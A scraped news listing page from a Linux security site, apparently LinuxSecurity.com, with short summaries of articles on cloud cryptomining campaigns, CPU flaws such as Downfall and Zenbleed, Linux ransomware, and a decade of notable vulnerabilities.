Alerts This Week
Warning Icon 1 758
Alerts This Week
Warning Icon 1 758

Stay Ahead With Linux Security News

Filter%20icon Refine news
X Clear Filters
X Clear Filters
View More

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Community Poll

Can sandbox isolation stop malware?

No answer selected. Please try again.
Please select either existing option or enter your own, however not both.
Please select minimum {0} answer(s).
Please select maximum {0} answer(s).
/main-polls/154-can-sandbox-isolation-stop-malware?task=poll.vote&format=json
154
radio
0
[{"id":497,"title":"Breaches happen despite container barriers.","votes":0,"type":"x","order":1,"pct":0,"resources":[]},{"id":498,"title":"Supply chain flaws exploit trust.","votes":2,"type":"x","order":2,"pct":100,"resources":[]},{"id":499,"title":"Flawed configurations expose vital files.","votes":0,"type":"x","order":3,"pct":0,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350
bottom 200
Loading...

Explore Latest Linux Security news

We found 4 articles for you...
212

Cloud Threat Advisory: Docker, Hadoop, Confluence, Redis Cryptomining Risks

A recent attack campaign targeted publicly accessible Docker , Hadoop , Confluence, and Redis deployments. The attackers exploited misconfigurations and known vulnerabilities to implant cryptominers on compromised systems. As Linux admins, infosec professionals, Internet security enthusiasts, and sysadmins, it is crucial to understand the implications of this attack and take appropriate measures to protect our systems. . What Is the Significance of This Cloud Security Threat? This campaign is unique, deploying previously unseen payloads, including four binaries written in Golang. The attackers exploit common misconfigurations and vulnerabilities to gain initial access and then employ a series of shell scripts and Linux attack techniques to establish persistence and deliver a cryptocurrency miner. This level of sophistication raises questions about the attackers' resources and intentions. The complexity of the infection chain in this attack is also notable. It involves over 10 shell scripts, binaries, persistence mechanisms, backup payload delivery methods, anti-forensics techniques, and user mode rootkits. This complexity demonstrates the effort attackers are willing to put into compromising systems. As security practitioners, we must be aware of threat actors' evolving tactics and techniques and continuously adapt our defense strategies. An intriguing aspect of this attack is using the shopt command in the shell scripts to prevent additional commands from being written to the history file. This anti-forensics technique effectively hides the attackers' activities. It is concerning that such techniques have not been observed in other campaigns, indicating the constant innovation and evolution of malware . Are other attackers using similar methods, and how can we detect and defend against them? This attack has significant implications for Linux users. It highlights the importance of regularly patching vulnerabilities and correcting insecure configurations in Docker, Hadoop, Confluence,and Redis deployments. Additionally, it emphasizes the need for ongoing monitoring and threat intelligence to detect and respond to such attacks promptly. The long-term consequences of this attack are concerning. It raises questions about the overall security posture of cloud environments and the inherent risks associated with exposing web-facing services to the Internet. As more organizations move to cloud-based deployments, the potential for attacks targeting these environments increases. Security practitioners must stay informed about reported vulnerabilities in cloud services and implement robust security measures. Our Final Thoughts on This Recent Attack This article serves as a wake-up call for Linux admins. The targeted attack campaign discussed here demonstrates threat actors' evolving tactics and techniques. It underscores the importance of maintaining strong security practices, regularly patching vulnerabilities, and continuously monitoring and adapting defense strategies. By staying informed , proactive, and vigilant, we can mitigate the risks posed by such attacks and protect our systems from compromise. . Examining the ramifications of a cloud security breach exploiting vulnerabilities within Docker, Hadoop, Confluence, and Redis through malicious cryptominer deployments.. Cloud Security Threats, Docker Security Risks, Cryptomining Attacks, Redis Deployment Risks. . Brittany Day

Calendar%202 Mar 08, 2024 User Avatar Brittany Day Cloud Security
76

Intel and AMD Processors Data Risk: Downfall and Zenbleed Threats

[BLACK HAT] Googlers have lately found not one but two more security vulnerabilities in Intel and AMD processors that can be exploited to steal sensitive data from a vulnerable computer's memory. . Specifically, there's one flaw in Intel components, and one in AMD. Both can be abused by malware running on a system, or a rogue logged-in user, to lift passwords, secrets, and other data out of memory that should be off limits. This should be concerning for those who use shared servers in the cloud. The Intel vulnerability, found by Daniel Moghimi and dubbed Downfall , was addressed on Tuesday, nearly a year after its private disclosure. The AMD vulnerability, found by Tavis Ormandy and named Zenbleed , was patched , to a degree, in July after being reported privately in mid-May, as we previously covered . . Recent vulnerabilities identified in Intel and AMD processors present significant risks for data leakage, threatening the security of cloud-based servers.. Intel Data Leak, AMD Security Flaw, Memory Breach, Cloud Malware, Processor Vulnerabilities. . Brittany Day

Calendar%202 Aug 14, 2023 User Avatar Brittany Day Organizations/Events
212

Hive Ransomware Targets Linux and FreeBSD Cloud Applications

Linux and FreeBSD variants of the Hive ransomware have recently been discovered, demonstrating how threat actors are increasingly targeting other OSes besides Windows, and are looking to attack cloud apps. . In a tweet on Friday, the ESET researchers posted that just like the Windows version, the Linux and FreeBSD variants are written in Golang, but the strings, package names, and function names have been obfuscated, likely with gobfuscate, which lets developers compile a Go binary from obfuscated source code. This new discovery from ESET clearly shows that attackers are thinking about Linux and cloud environments, many of which operate on Linux, said John Bambenek, principal threat hunter at Netenrich. . Cybersecurity experts unveil new Linux iterations of Hive ransomware aimed at cloud applications, illustrating the changing landscape of digital threats.. Hive Ransomware, Linux Variants, FreeBSD Threats, Cloud Security Risks. . MaK Ulac

Calendar%202 Nov 02, 2021 User Avatar MaK Ulac Cloud Security
212

Top Cloud Security Threats Facing Linux Operating Systems Today

Linux is growing in popularity due to the impressive security, stability and flexibility of the OS, making it an increasingly attractive attack target. Learn about the top cloud security threats to your Linux system. . Many regard Linux as the most secure operating system due to its stability, flexibility, and open-source nature. Linux is also powerful and dependable when it comes to performance and efficiency. Linux has also proven its superiority by continuing to be the only operating system to be used in all of the world’s top 500 supercomputers. It also supports nontraditional IT applications such as heavy machinery controlling, robotics, high-speed trains, and even major space programs. And in an increasingly cloud-centric world, Linux allows organizations to leverage and get the most of their cloud-based environments and power their digital strategies. But this success has a downside: With Linux an increasingly popular choice for businesses counting on, it is now a major attack vector for cybercriminals looking to find holes in its security. Cybersecurity company Trend Micro released a new research report that sheds light on the current state of Linux security. The report provides several valuable insights and focuses on vulnerability distribution, major threats, and security drawbacks of the Linux operating system. It is especially eye-opening for those who mistakenly believe Linux is invulnerable to attacks. . As Linux in the cloud rises, it shapes infrastructure and cybersecurity. This article uncovers growing threats and essential strategies for robust protection against vulnerabilities. Linux Cloud Security, Cybersecurity Threats, Attack Vectors. . Anthony Pell

Calendar%202 Sep 03, 2021 User Avatar Anthony Pell Cloud Security
83

Updated Pro-Ocean Malware Targets Apache, Oracle And Redis Privacy Issues

The evasive new Pro-Ocean cryptojacking malware is sidestepping security defenses and targeting Apache, Oracle and Redis servers. . A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke , the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up. "Pro-Ocean uses known vulnerabilities to target cloud applications," the researchers detailed. "In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ( CVE-2016-3088 ), Oracle WebLogic ( CVE-2017-10271 ) and Redis (unsecure instances)." The link for this article located at The Hacker News is no longer available. . An economically-motivated cybercriminal has unveiled a new variant of the Aqua-Mine cryptojacking malware targeting Angular and MySQL servers.. Pro-Ocean Malware,Cryptojacking Attacks,Cloud Application Threats. . LinuxSecurity.com Team

Calendar%202 Feb 01, 2021 User Avatar LinuxSecurity.com Team Hacks/Cracks
210

Exploring Major Security Threats Affecting IT Systems In The Last Decade

Thank you to Skynats for contributing this article. This past decade has been plagued with security vulnerabilities. Let’s have a look at the top vulnerabilities that have recently crippled the IT world. Badlock: Badock is a crucial security bug affecting Windows computers and Samba servers. It is identified using the following reference: (CVE-2016-0128(Microsoft) CVE-2016-2118(samba). The RPC services allowed an attacker to become a man in the middle to intercept the communication between a client and a server hosting a SAM database to exploit and force the authentication to downgrade, allowing the attackers to access the SAM database. Blueborne: Blueborne is a virus that spreads through the air. Yes, it of course through the Bluetooth on your device. Everything from your smartphone to other devices (TV, Computer, smart cars, laptops) are Bluetooth enabled and active almost all the time, leaving these devices vulnerable to malware attacks that can remotely seize them without user permission. Cloud Bleed: This was another leading cloud-based security vulnerability affecting Cloudflare's reverse proxies which was discovered on February 17, 2017. Most of the busiest websites and the apps rely on Cloudflare's protection. This security bug caused their edge server to run past the end of a buffer and then return the memory which contained private information such as: 1. HTTP cookies 2. Authentication tokens 3. HTTP post bodies 4. Tons of sensitive data and more The worst part was that some of this data was cached by search engines. Dirty Cow: This was another serious security problem discovered in the way the Linux kernel memory handled the copy on write (COW) that affects Linux-based OSes including Android devices that used an older version (before 2018) of the Linux kernel. Dirty Cow is a local privilege escalation vulnerability bug that exploits a rare condition by implementing the copy on write mechanism. Computers and devices that still using an older version of theLinux kernel remain vulnerable, and any user can become root in less than five seconds. The exploitation of this bug doesn't leave any trace in the log, so you can't detect if someone has used this exploit against your server. Foreshadow: This bug (L1TF or foreshadow) affecting Intel/AMD processors will allow attackers unprecedented access to sensitive information that is stored on a personal computers and cloud server. Foreshadow has two versions: the original attack which extracts data from SGX enclaves and the second version (next-generation) which targets virtual machines (VMs), hypervisors (VMM), OS Kernel memory and system management mode (SMM) memory. Foreshadow is similar to the Spectre security bug which affects the Intel and AMD chips, and the Meltdown security bug also affects Intel. Nevertheless, applying software patches may help mitigate some concern, but the users may see some considerable changes in overall PC or server power by doing so. Heartbleed: Heartbleed is a serious vulnerability in the popular open SSL cryptographic software library, used widely in implementation of the transport layer security (TLS) protocol. The Heartbleed vulnerability was publicly disclosed in April of 2014. iSee You: This is an Apple webcam vulnerability which is a silent malware attack. Apple laptops affected are capable of running all sort of operating systems, including macOS, Microsoft Windows and Linux. Researchers have released iSightDefender, a macOS kernel extension to reduce the attack surface under the macOS operating system. KRACK: (Key Reinstallation Attack) is a replay attack (a type of exploitable flaw) on the Wi-Fi protected Access protocol (WPA) used to secure the Wi-Fi connections. It was discovered in 2016 by Belgian researchers. All the major software platforms that use Wi-Fi protected access are affectedincluding Microsoft windows, macOS, iOS, Linux, Andriod and OpenBSD. Lazy: Lazy, which is also referred to as Lazy FP State Restore or LazyFP, is a securityvulnerability affecting Intel CPUs. The vulnerability is caused by a combination of flaws in the speculation execution technology. This vulnerability is used to leak the content of the FPU registers that belongs to another process. Lazy is related to the Spectre and Meltdown vulnerabilities which were publicly disclosed in January of 2018. Linux .encoder: This is considered to be the first ransomware Trojan targeting computers and cloud servers running Linux. There are additional variants of this Trojan that target other UNIX and UNIX-like systems which were discovered on November 5, 2015. Meltdown: Meltdown is a severe security vulnerability in tech media that is found in almost all CPUs used in modern devices. Mobile phones, laptops, systems and internet of things (IoT) devices are vulnerable. Meltdown CPU vulnerabilities and exposures will break the fundamental isolation between the user and the application. This will allows a rogue process to access the memory of other programs and the operating system. The Meltdown vulnerabilities primarily affect Intel microprocessors, but will also affect the ARM Cortex-A75 and IBM's Power microprocessors. It does not affect AMD CPUs. Microarchitectural: The Microarchitectural Data Sampling (MDS) vulnerabilities are a set of weaknesses in Intel x86 microprocessors that use hyper-threading to leak data across the protection boundaries that are architecturally supposed to be secure. After Meltdown, Spectre and Foreshadow, Microarchitectural is considered the most critical vulnerability in modern processors. The attack exploits vulnerabilities have been labeled as Fallout, RIDL (rogue in-flight Data load) and Zombiaload and allows attackers to steal sensitive data and keys. Have another vulnerability that you feel belongs on this list? Please do not hesitate to reach out and let us know! . . Thank you to Skynats for contributing this article. This past decade has been plagued with security . thank, skynats, contributing, article, decade, plagued,security. . Brittany Day

Calendar%202 Jan 14, 2021 User Avatar Brittany Day Security Vulnerabilities
77

Docker Security Insights: Malware Threats and Developer Responsibilities

Three years after the first malware attacks targeting Docker, developers are still misconfiguring and exposing their Docker servers online. Docker malware is now common, making this lackadaisical attitude toward Docker security increasingly problematic. . Towards the end of 2017, there was a major shift in the malware scene. As cloud-based technologies became more popular, cybercrime gangs also began targeting Docker and Kubernetes systems . Most of these attacks followed a very simple pattern where threat actors scanned for misconfigured systems that had admin interfaces exposed online in order to take over servers and deploy cryptocurrency-mining malware. Over the past three years, these attacks have intensified, and new malware strains and threat actors targeting Docker (and Kubernetes) are now being discovered on a regular basis. . Engineers must focus on improving Docker safety in light of the increase in malware aiming at container systems since 2017.. Docker Security, Malware Threats, Developer Awareness, Cybercrime, Container Security. . LinuxSecurity.com Team

Calendar%202 Dec 01, 2020 User Avatar LinuxSecurity.com Team Server Security
83

Understanding Cloud Threats: Hacking Strategies for Secure Data

If Willie Sutton had been a hacker, we know what he. But how much loot will modern-day Willie Suttons really be able to plunder from the cloud?. Cloud environments are prime targets for hackers due to issues like misconfigurations and weak APIs. Strong access controls, audits, and employee training are crucial for risk mitigation.. Cloud Security, Hacking Techniques, Cyber Threats. . LinuxSecurity.com Team

Calendar%202 Oct 14, 2010 User Avatar LinuxSecurity.com Team Hacks/Cracks
News Add Esm H340

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Community Poll

Can sandbox isolation stop malware?

No answer selected. Please try again.
Please select either existing option or enter your own, however not both.
Please select minimum {0} answer(s).
Please select maximum {0} answer(s).
/main-polls/154-can-sandbox-isolation-stop-malware?task=poll.vote&format=json
154
radio
0
[{"id":497,"title":"Breaches happen despite container barriers.","votes":0,"type":"x","order":1,"pct":0,"resources":[]},{"id":498,"title":"Supply chain flaws exploit trust.","votes":2,"type":"x","order":2,"pct":100,"resources":[]},{"id":499,"title":"Flawed configurations expose vital files.","votes":0,"type":"x","order":3,"pct":0,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350
bottom 200
Your message here